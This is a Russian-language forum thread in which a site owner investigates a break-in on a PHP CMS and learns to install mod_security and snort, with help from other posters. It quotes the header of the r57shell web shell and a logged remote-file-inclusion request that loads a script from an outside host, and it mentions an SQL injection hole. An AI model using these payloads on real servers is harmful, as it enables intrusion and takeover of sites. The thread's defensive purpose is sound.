Короче появилась маленькая проблема. Хакеры залезли на сайт моего хорошего знакомого и хорошо провели там время. Удалили часть таблиц и заменили админа.
Восстановить все из копии базы труда особого не составило, но хочется избежать этого в дальнейшем. Для начала хотелось бы узнать как была проведена атака. Сайт сделан при помощи известной СМС на пхп и му эскьюэл. Система под юниксом, в логах апачи записаны только ошибочные запросы. Просматривая их смог только заметить, что еще летом появился скрипт, который пытался найти пхпмуадмин путем перебора возможных путей доступа. В день вероятного взлома ничего особенного не заметил. Что еще можно глянуть?
Понятно, что лучше всего загрузить последнюю версию со всеми известными заплатками, но проблема в том, что скрипты и база несколько модифицированы и переносить все на новую систему будет довольно накладно, для некомерческого сайта. Да и результат будет подобный через пару лет. Пока простого решения как усложнить жизнь хакерам, я не вижу, но надеюсь на ваши предложения.

большая часть сайтов на php просто дырява by design - большая часть их разработчиков не имеет понятия о безопасности и т.п. вещах.
если хочется вносить свои изменения, то лучше всего вести их в системе контроля версий, в двух ветках = своей и оригинальной, оригинальную регулярно обновлять, а затем - сливать с изменениями в своей ветке

Ну дома такое разворачивать сильно накладно. Один раз я уже версии сравнивал, дофига времени ушло.
Пока меня интересует как можно от апачей и юникса больше инфы получить, пусть хоть на будущее. Сегодня гады уже и до меня добрались. Видно шило елозит кому то.

поставь mod_security и не парься :-)

а дома проблем особых нет такое развернуть - ставишь любую из распределенных систем контроля версий, настраиваешь tailor на синхронизацию и спокойно работаешь

А где ее ставить? Я пока нашел пару советов по пхп.ини счас буду смотреть. Я под юниксом только как пользователь немного работал, а с апачем так вообше нет.
Как его вообще перезапустить? Спасибо зп советы, побежал доки читать.
Пока вот начал с изучения приемов атаки на сервера. Видимо прийдется каждый запрос анализировать.

Да не хочется лишних резидентов в памяти, но надо будет на досуге попробовать.

Вота чего они хотели через RFI запустить, видимо удалось.
<?php
/******************************************************************************************************/
/* ## ##
/* ## ##
/* #######
/* ## ##
/* ## ##
/*
/*
/* r57shell.php - скрипт на пхп позволяющий вам выполнять шелл команды на сервере через браузер
/* Версия: 1.23
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/******************************************************************************************************/
/* ~~~ Настройки ~~~ */
error_reporting(0);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$safe_mode = @ini_get('safe_mode');
$version = "1.23tr
[KeyCoder]";
if(version_compare(phpversion(), '4.1.0') == -1)
{
$_POST = &$HTTP_POST_VARS;
$_GET = &$HTTP_GET_VARS;
$_SERVER = &$HTTP_SERVER_VARS;
}
......

А как определить версию апачи?
Нашел доки но что подходит не знаю пока
http://apache2.org/

Из Документации
"The server access log records all requests processed by the server. "
Из файла этого не видно, в основном только линии с кодом 40х, строк с "нормальным" доступом нету, в чем может быть причина? То бишь с кодом 200 есть немного. Но если к примеру, я похожу по серверу в логе нету ничего.

Вроде нашел папку где полно mod_xxxxx.so видно туда надо закинуть. А где ее взять эту мод? И видимо надо прописать еще где-то.

как устанавливать - читать надо на сайте mod_security.
версию апача можно определить с помощью команд apache2 -v или httpd -v
все логи ведуться в файлах errors_log & access.log но когда их распарсишь - будет уже поздно что-то делать, поскольку дыру уже пробьют.
поэтому - мой совет:
- приложения на php лучше держать в виртуальных линуксах, взломав которые не попадешь в основной линукс
- регулярно обновлять php & apache & софт на php
- установить mod_security и настроить его - на сайте есть подробные инструкции по настройке а также наборы сигнатур

snort поставь и будут подробные логи. А пока что можно сравнивать апачевы access.log, error.log, даты изменения в файлах и т.д. На будущее можно запихнуть все в чрут и делать регулярные бэкапы.
---
Карманы жилетки Анатолия Вассермана расширены в четвертое измерение.

Спасибо, сайт уже нашел, но там только исходники, я не уверен, что на предоставленном нам сервере все есть для компиляции. Но бум искать, пока это самое лучшее решение.
http://www.modsecurity.org/
\все логи ведуться в файлах errors_log & access.log но когда их распарсишь - будет уже поздно что-то делать
Да нашел я их, но там нет и половины данных. Хотелось бы узнать как проникли и закрыть в первую очередь эту дыру.
\а также наборы сигнатур
наборы вроде есть на другом сайте. Сейчас уже не помню на каком но многие советовали.
\- регулярно обновлять php & apache & софт на php
Согласен на 100%, но это же не работа. Сделал и забыл. Да и боюсь весь стандартный софт зашаренный.
\приложения на php лучше держать в виртуальных линуксах,
думаю, что так и сделано. Сервер то прокатный.

\snort поставь и будут подробные логи.
Это мне пока не очень много говорит, но бум искать.
\А пока что можно сравнивать апачевы access.log, error.log,
Да смотрел я их уже, основной инфы нет, видны только ошибки доступа, "правильных" запросов нет и близко.
\даты изменения в файлах
Искал тоже, ничего не нашел пока.
\На будущее можно запихнуть все в чрут
Chrut? Количество бэкапов ограничено всего двумя, пока спасают простые копии.
Кстати, нашел что и почтовым сервером \гмайл вроде\ пользуются. Что есть для его защиты?

snorthttp://http:/en.shhikipedia.org/shhiki/Snort_(softshhare)
chroothttp://http:/en.shhikipedia.org/shhiki/Chroot
Два бэкапa вполне достаточно, тем более, что можно делать инкрементальный бэкап.
Гмейл, это почтовый сервис от гугла. Почтовый сервер у вас другой, и возможно не один. Защита, как всегда: все лишнее убивается, tls/ssl, пароли, отслеживаем критические дыры. Обновления можно производить автоматически, кстати.
---
Анатолий Вассерман - первая учительница Владимира Путина.

Спасибо, я правда пока в разъездах попробовать что-то не получается.
Сайт по ссылкам у меня сейчас не открывается, но нашел snort на другом
http://www.snort.org/
C chroot проблемы - находится только команда.
Хотя вначале задача стоит еще проще. Надо попробовать компильнуть чего то на сервере, но что там за компайлер пока не знаю. Ну и Нортон Коммандер хоцецца, до простят меня юниксоиды.
Кстати, могут быть где то еще следы вторжения кроме логов апачи?

Бо, сделал большие достижения в освоении юникса, загрузил снорт, распаковал и запустил конфигуре, как в доке написано, но застрял на pcre
checking for libpcap version >= 0.9... no
./configure: line 1: pcre-config: command not found
./configure: line 1: pcre-config: command not found
checking pcre.h usability... no
checking pcre.h presence... no
checking for pcre.h... no
ERROR! Libpcre header not found.
Get it from http://www.pcre.org
Взял, загрузил, распаковал, а дальше то что делать? Не нашел пока как ее инсталлировать.

\версию апача можно определить с помощью команд apache2 -v или httpd -v
Пробовал, ни одну из комманд не знает apache тоже не идет

А зачем собирать самому если репозиторий дистрибутива содержит, наверняка, последнюю стабильную и безопасную версию софта? На основе какого дистрибутива твой сервер?
Чрут и есть команда. Твоя задача, создать чрут-окружение, в котором гонять апач и сопутствующие програмы.
> checking for libpcap version >= 0.9
не стоит либкап и пцре. Ставь все из репозитория дистрибутива через пакетный менеджер, он и зависимости учтет , у удалять/oбновлять потом проще.
---
Enter нажат, к чему теперь рыданья...

начал mod security ставить и опять вперся в проблемы юникса, точнее в отсутствии опыта работы с ним.
1.Как найти какой либо файл во всех каталогах? Надо lнайти ibxml2, httpd.conf
Install the latest version of libxml2, if it isn't already installed on the server.
Edit Makefile to configure the path to the Apache ServerRoot directory. You can check this by identifying the ServerRoot directive setting in your httpd.conf file. This is the path that was specified with the "--install-path=" configuration flag during compilation (for example, in Fedora Core4: top_dir = /etc/httpd).
2. Откуда брать special.mk?
Makefile:40: /usr/local/apache2/build/special.mk: No such file or directory
make: *** No rule to make target `/usr/local/apache2/build/special.mk'. Stop.

> Ну и Нортон Коммандер хоцецца, до простят меня юниксоиды.
mc - Midnight Commander. Бесполезная вещь, баш лучше.
---
Кто рано встает, тот всех достает.

\А зачем собирать самому
Если бы было...
\На основе какого дистрибутива твой сервер?
Где-то видел, но точно не помню, что-то с Сюзи связано.
\Твоя задача, создать чрут-окружение, в котором гонять апач и сопутствующие програмы.
Пока это мне не о чем не говорит, надо еще читать и читать.
\Ставь все из репозитория дистрибутива через пакетный менеджер
Делал чисто как в доках написано. А где он должен быть? Не забывай, что я только под виндами сидел, про юникс знаю все чисто по наслышке.

\Midnight Commander. Бесполезная вещь, баш лучше.
Бум искать, пасиба. Баш - это шелл что ли?
Не привык я руками все набирать. Это ж блин что бы в каталог перейти надо его имя набрать.

Автодополнение не работает ?

А в каком клиенте оно работает и как его активировать? У меня же нет прямого доступа к серверу.

Доступ с консоли виндоус ?
Тогда прими мои соболезнования :-)

http://www.google.com/search?q=suse+administrator+guide&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
http://www.lesbell.com.au/Home.nsf/b8ec57204f60dfcb4a2568c60014ed0f/355166f5bfa721afca256da0000a30f4?OpenDocument
---
Когда Анатолию Вассерману не хватает мелочи на новый осциллятор, он всегда идёт на вокзал, подходит к напёрсточникам и, неглядя, выигрывает.

\Доступ с консоли виндоус ?
Угу, как догадался? Надежда всегда умирает последней.
Кстати, установил сегодня на работе, на какой-то юних мс. Ничего так, понравилось.

Хорошая идея, я искал именно то что конкретно нужно. А тута более общее. Правда не знаю когда я все это освою. У меня были совсем другие планы на этот месяц.
Спасбо за поддержку.

Да уж мучения хорошие, что на работе заняло 10 минут, тута полвечера убил. Ладно, хрен с ним не знал, что конфигуре надо разрешить выполнение для всех. Но какого билдется через раз?
В большинстве случаев получаю что- то типа:
/bin/sh: fork: Cannot allocate memory
Making in src
cannot set up thread-local storage: cannot set up LDT for thread-local storage
или
make[2]: vfork: Cannot allocate memory
Нашел как память проверить
ps -aux
или
top
Все вроде нормально, занимается на 0.5%
Кстати, эта строка в списке задач - Спам мне или от меня? Так как данный адрес мне совем не знаком.
qmailr 24864 0.0 0.0 2640 744 ? S 22:05 0:00 qmail-remote electronic-atlas.com paula@electronic-atlas
Снорт установил, но он гад не запускается
xxxxx-xxx-xxx-xxx:/usr/local/bin # dir
...
-rwxr-xr-x 1 xxxxx xxxxx 8174105 Dec 18 23:54 snort
xxxxx-xxx-xxx-xxx:/usr/local/bin # snort
bash: snort: command not found
Что еще упустил?

/usr/local/bin в PATH занесено ?
Если запускаешь файл с текущей директории то ./snort

Подход в корне не верен. Читайте статьи на тему администрирования линукса.
---
Владимир Путин и Джордж Буш лишь пешки в коварной игре Анатолия Вассермана.

А можно немного пояснить смысл верного подхода? Этож годы надо, чтобы в этом подлом юниксе с закрытыми глазами плавать.

>/usr/local/bin в PATH занесено ?
там же валом всего добра, должен быть по идее.
>то ./snort
как хорошо что в ДОСе такой дурки нет,если ты в текущем то запускай все с текущего. А тут ты в текущем, и еще говори, что с текущего запускать.
Главное, что я конфиг именно так и запускал, но не дошло, что для всех файлов надо.
Кстати Таб работает \стрелки тоже! \ и в окне клиента, расширяет имена файлов, спасибо за подсказку. \правда уж не помню кто писал\

Должен быть и есть разные вещи , echo $PATH вообщем .

Представь такую ситуацию , у тебя лежит ls в /usr/bin(прописан в PATH) и твой скрипт ls в текущем каталоге , как запустить твой скрипт ?

./ можно прописать в PATH.
---
С настyпающим Вас, господа, Голым Нодом!

\Должен быть и есть разные вещи , echo $PATH вообщем
Глянул, тама, я только через env сделал.
\Представь такую ситуацию , у тебя лежит ls в /usr/bin(прописан в PATH) и твой скрипт ls в текущем каталоге , как запустить твой скрипт ?
все пускается с текущего, если тама нету то искать в пасе. Мне кажется такой подход вполне разумным, иначе нафиг надо было идти в текущий.

Я уже написал: пакеты ставить из дистрибутива, а не заниматься самосбором. Читать руководства. Точно не помню, но скорее всего снорт даже не запустится с простого "./snort". Параметры, конфиги... Кроме того его надо запускать в режиме демона и прописать в стартовые скрипты системы.
Я бы рекомендовал попросить хостера провести установку и базовую настройку, наверняка они оказывают подобные услуги. Скорее всего у них это займет немногим больше получаса.
---
Я стар... Я очень стар... Я супер star!

/пакеты ставить из дистрибутива, а не заниматься самосбором
Я бы с удовольствием установил, ежели бы они там были. Раз разработчик не сделал, значит причина была.
\Читать руководства
Чмиаем, но все сразу не осилить.
\Точно не помню, но скорее всего снорт даже не запустится с простого "./snort".
для теста есть ключик "в". Уже тестил, работает. Сейчас сижу читаю доки.
\Кроме того его надо запускать в режиме демона и прописать в стартовые скрипты системы.
Мне тоже так показалось, только как вторую часть сделать я пока не знаю.
\Я бы рекомендовал попросить хостера провести установку и базовую настройку
нифига они не хотят делать., либо такое заламывают. Я их спрашивал стоимость нахождения причин атаки. Но проблемо говорят, гарантии что найдем никакой, сколько времени на поиск уйдет не знаем, может и весь рабочий день, но 100 евриков в час надо платить. Основной мотив ответов, Мы Вам систему продали теперь Вы за нее ответственны. В принципе, я мог бы знакомому сказать сорри, нету времени, но себе то такое не скажешь, хотя пару лет я себе практически ничего не делал, только со спамом боролся.

Да когда знаешь, не в лом набрать. Прописать то можно, но кто его знает как это может повлиять на что то другое.

По крайней мере в 10.1 снорт входит. Читай про систему управления пакетами и ставь "родной" пакет.
---
На вопрос "Что вы здесь делаете?" 78% респондентов ответили отрицательно.

Если ты имееш в виду версию сюзи, то стоит 9 с кусочком. Вроде запустил "мой" снорт но забыл ключик для включения лога. Теперь ищу как его обнаружить и убить.
Бум еще читать, но глаза и так уже на лоб лезут. По 13..14 часов каждый день сидеть за моником

хорошо :-)
В текущей директории лежит самосборный snort , как запуститъ глобалъный ?

Я так и знал, что тебя этои вопрос заинтересует, заломало писать предупреждение, что бы не спрашивал.
Тогда надо полный путь давать, иначе как говорил нафиг было суваться в текущий каталог. Но в путь тоже не помешает прописать. Хотя, думаю плюсы и минусы есть у каждого подхода.
Мне лично больше по душе ДОСовский подход.

А если он неизвестен ;-)
/bin /sbin /usr/bin /usr/local/bin , а может где-нибудь в opt ? Придется долго перебирать(про locate я надеюсь ты не знаешь)

Всё новое пугает , это доказано .
Хотя именно такие вещи в никсах более продуманы .

Тады валим с текущего, пусть сама ищет :)

Не..., только which добрые люди подсказали.

Пугает и не нравится это две разные вещи. Маке файлы я еше в детском садике видел, но они мне так до сих пор и не нравятся.

Вполне возможно, но именно из-за таких вещей я его и не люблю.

Сколько раз за сегодня материл ентот юникс подсчитать тяжело, но библиотеки в конце концов сделались, больше всего проблем было с мод секурити, то одно ей дай, то другое.
в итоге стопорнулся на этой ошибке:
ххх:/etc/init.d # ./apache2 configtest
Syntax error on line 9 of /etc/apache2/sysconfig.d/loadmodule.conf:
Cannot load /usr/lib/apache2/mod_security2.so into server: /usr/lib/apache2/mod_security2.so: undefined symbol: msr_log
Кстати, нашел очень неплохое описание по установке мод секурити:
http://www.novell.com/coolsolutions/feature/19399.html
хотя через маке не получается билдить, только через /apxs2 √cia
и абзац про yast не работает, то есть yast то запускается но никаких зависмостей связанных с мод секурити не выдает.
Кстати, бинарники для сюзи 9.1 тоже искал, не нашел.
Больше всего меня убило, что из редактора нельзя найти выход. Каким то образом зашел в vim /по хелпу потом узнал/, а выйти ну никак,пришлось консоль закрыть после 10 минутной броьбы с клавивтурой.

С таким уровнем ты не защитищь систему, а скорее наоткрываешь новых дыр.
Для начала введи команду "vimtutor".
---
Когда поломается интернет, можно будет подключиться к Анатолию Вассерману и восстановить его из кэша

Ну если для установки однго плагина и одной программы нужно досконально знать систему, да к тому же можно еще что-то попутно поломать,
то слава и хвала такой системе!

Вопрос: У меня проблемы с установкой программы под виндовс.
Ответ: Изучи для началп нотепад, это сильно поможет в решении проблемы.
Ничего не напоминает А вообще, я не знаю какой уровень дружелюбия дать интерфейсу пользователя, когда для выхода из программы надо нажать 4! клавиши "esc", ":", "q", "!"- при этом ":" и "!" надо еще найти /то бишь помнить какая раскладка клавы на сервере/. Совсем не уверен, что выход из других программ будет происходить аналогичным образом.

Ну да , мышковозам в никсах трудно ... ;-)

Не сравнивай вим с говном , которое и редактором назвать язык не поворачивается .
И зачем ты вообще в него полез , существуют же простенькие редакторы .

> Ну если для установки однго плагина и одной программы нужно досконально знать систему, да к тому же можно еще что-то попутно поломать,
> то слава и хвала такой системе!
Ты же хочешь настроить систему безопасности, а для этого нужно знать систему. А если тебе просто "поставить", то флаг в руки, но толку никакого не будет.
По поводу вима. Отличный редактор, очень удобный и вполне логичный, просто нужно потратить 20 минут на ознокомление, к тому же это основной инструмент настройки в твоем случае. Если так тяжко, попробуй нано или мцедит.

Какое блин трудно, кошмар. Дарог для мышей савсем нету.

Я в него не лез, он сам пришел :) Просто непонятно, зачем простые вещи делать так сложно. Хотя, немного понятно. Никсы зародились тады, кады был токи АЦ дисплей. Хотя почему не сделать было выход одной комбинацией с текстовым подтверждением, непонятно.
Мне редактора от мс хватает спокойно, хотя и не нашел как там текст выделять. Ежели что в виндах можно подправить.

Чтобы это делать надо действительно хорошо знать систему, а для этого нужно не одну шишку набить предварительно, поэтому такой задачи я не ставлю. Тем более что это нужно делать постоянно.
У меня гораздо проще задача. Для начала получить протокол действий злоумышленника. Затем найти дырку через которую лазять и ее заделать, заодно глянуть на подобные. Сервер сам по себе интереса не представляет, разве что как платцдарм для нападения на другой, более жирный. Почтовый сервер правда для спама пользуют, но это будет уже следующим этапом.

Если бы я работал все время в никсах, то задача была бы посложнее. Пока хотя бы поставить, а там уж видно будет.

Да не тяжко, если бы был нужен, доки прочитать не проблема. Просто как пример написал, накипело.
Вот еще один примерчик могу подкинуть.
Транслятор через маке гонит список ошибок на пару листов. Переназначение вывода ">" не работает, " | more" тоже не идет. И как тогда спрашивается узнать первую ошибку?

Сообщения об ошибках обычно пишутся в STDERR в то время как конструкции ">" и " | more" действуют на STDOUT.
Варианты решения (http://tldp.org/LDP/abs/html/io-redirection.html):
make 2>&1 | more

Это я тоже подумал, только не знал что stderr можно переназначить

А так не пойдет? Убегаю счас, пробовать некогда.
make &> еrror.txt
Спасибо, как раз кстати. Оказывается мод секурити 2 надо только через маке компилировать, а там вагон с тележкой ошибок. Полно людей имеет такую же ошибку как и у меня.
Зато удалось зарестироваться наконец на снорте /хвала суппорту/ теперь есть доступ к официальным правилам. Попробую наверное его установить следующим этапом.

После новогодней паузы, занялся опять апачем. Один этап прошел! Спасибо всем за поддержку
Мод секурити запустил и работает. Проблема была, что еще один путь поиска в майк файл добавить надо было. Попутно нашел еще один лог файл под гигабайт от апачей. Он оказыватся в двух местах пишет лог. Теперь надо хороший анализатор найти. Один нашел, он таких больших файлов не любит.
Кстати мод секурити за пару часов работы выловил уже одно покушение
GET /modules.php?name=News&file=article&sid=29/language/lang_english/lang_main_album.php?phpbb_root_path=http://forum.xxx.net/images/avatars/.as./figo.txt
правда вот логи засираются предпреждениями типа
modules.php][2] Warning. Operator EQ match: 0. [id "960903"] [msg "ModSecurity does not support content encodings"] [severity "WARNING"]
[rid#845cfb0][/modules.php][3] Could not set variable "resource.alerted_960903_compression" as the collection does not exist.
Пока есть только идея поискать в правилах 960903 и убить их. Есть ли лучший способ уменьшить логи мод секурити?

Мы гордимся тобой ;-)

Так я же не для похвастаться написал, а для отчета и новых вопросов.
Кстати, есть уже новый большой вопрос как мне gmail защитить \не google mail !\, что бы посторонние спам не слали через сервер. Глянул в настройки почты клиента - стоит ключик, что почта должна передаватся с паролем, но в логах почты на сервере полно строк где не похоже на использование пароля.
Сорри qmail, глаза залипли

qmqil?
---
Загорелся кошкин дом. Тилибом. Тилибом. ФААЯЯЯЯЯЯЯ!!! [Scooter]

http://www.qmail.org/
Раньше вроде другой нашел, от автора, где еще премию дают за его взлом, но сейчас не находится.

SMTP authentication?

Это мне тоже пришло, но смущает что на клиенте включено, значит и сервер должен поддерживать. Может настройки не совсем правильные. Там еще ИМАР сервер крутится, так у него в настройках опрос пароля был отключен, но там всего один файл конфигурации.
Есть простой способ проверить, что почта по стандарту с паролем на СМТП? Пока программку писать некогда.

Вообще говоря нет (зависит от настроек).
СМТП может работать (упрощённо) в двух ролях одновременно -
1. приём сообщений для "этой" машины (
2. приём сообщений от авторизованных клиентов и передача их дальше (режим прокси).
Насколько я понимаю у тебя не так работает авторизация по 2-ой роли.

можешь вот так потестировать (хотя я бы на это не полагался)
http://www.thomas-fahle.de/pub/perl/Mail_and_News/Telnet_SMTP.html#telnet

Раз нету, значит бум программку тестовую делать на пхп должно вроде пару строчек занять.
Я думал может еще какой то плагин есть для защиты.

Точно. Вижу по процессам и логам, что кто-то почту посылает, но логоут строк нету, а от меня есть. Хотя это могут быть мои логи и на прием. Еще не разбирался. Сейчас лазю по коду пхп с включенными предупреждениями локально на апаче. Уже ошибок валом понаходил. Нашел также строку с которой взломали сайт, работает классно. В коде было типа
select .... $var sort by...
Уже больше нету . Есть еще пару идей по простой превентивной защите. Пошел дальше кропать...